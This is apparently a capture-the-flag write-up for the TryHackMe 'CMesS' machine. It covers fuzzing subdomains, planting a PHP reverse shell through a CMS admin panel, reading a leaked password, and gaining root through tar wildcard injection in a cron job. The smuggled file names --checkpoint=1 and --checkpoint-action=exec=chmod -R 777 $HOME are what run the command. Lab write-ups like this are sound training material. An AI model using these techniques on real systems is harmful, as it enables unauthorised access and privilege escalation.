CMesS Writeup
tryhackme/cmess
Setup
- Add
cmess.thmto hosts file as instructed
Enumeration
- Scanning
- Rustscan says ssh and http are available
- Feroxbuster doesn’t show much interesting stuff
- admin panel is at
/admin - there is a
/srcdirectory tree but everything is 403 access denied
- admin panel is at
- Use burp intruder to scan subdomains (see hint 1)
- Send request for
/to intruder (ctrl+I) - Use intruder to modify Host header (
Host: §§.cmess.thm) - Import some payloads, I used
/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt - Start attack
- Send request for
dev.cmess.thmcontains password reset for andre:XXXXXXXXXXX
Exploitation
Initial shell
- Use password reset we found to login into
/adminasandre@cmess.thm - Use file manager to modify index.php and add reverse shell (revshells.com - PHP PenTestMonkey)
Getting ssh access
- Access reverse shell (navigate to
/in browser)- Looked for suid
find / -perm /6000 -type f -executable 2>/dev/null- nothing sudo -l- nothing- Cannot access /home/andre
- In /opt there is a file called
.password.bakthough /opt/.password.bakcontains a plaintext password 🤔
- Looked for suid
- Use password here to login with ssh as andre
- Now we can access
/home/andre/user.txt
Priviledge escalation
- In andre’s home folder he has folder called backup
- The note contained here says everything in the folder will get backed up
- After finding no SUID bins earlier and checking
sudo -lit’s a pretty easy guess that the backup script will allow for privesc
- Proceed to search for script that does backing up
find / -iname "*backup*" 2>/dev/null- nothingcrontab -e- nothingvim /etc/crontab- bingo
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
- Backup uses tar followed by a
*meaning we should use an unsafe shell expansion- gtfobins has a nice guide for how to get tar to exec commands
- The * in
cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *will expand to the names of the files in/home/andre/backup- This means by creating files in this directory we can control the arguments to tar and execute the exploit described on gtfobins
- There are some limitations to this though as file names cannot contain some characters like
/ - I find the easiest way for me to create files with weird names like
--checkpoint=1is with vim see below
- Ended up just chmodding
/rootto 777 (easier than trying to get a shell)
Setting arguments with bash file expansion
When a command contains a * the shell will automatically expand this * to a space-seperated list of file names in the current directory.
To exploit this we need to come up with a command to execute with no / in here I will use chmod -R 777 $HOME as all we need to do is read /root/root.txt,
by chmodding we can read this file from our current user.
The command we are aiming to execute is
cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz --checkpoint=1 "--checkpoint-action=exec=chmod -R 777 $HOME"
To do this we first cd to /home/andre/backup
Then create the first argument with vim
- run
vim - type
:wq --checkpoint=1
Then the second argument
- run
vim - type
:wq --checkpoint-action=exec=chmod\ -R\ 777\ \$HOME
When you run ls the output should look like this
andre@cmess:~/backup$ ls
--checkpoint=1 --checkpoint-action=exec=chmod -R 777 $HOME note
After cron executes the job you will be able to cat the final flag :)
tags: writeup - tryhackme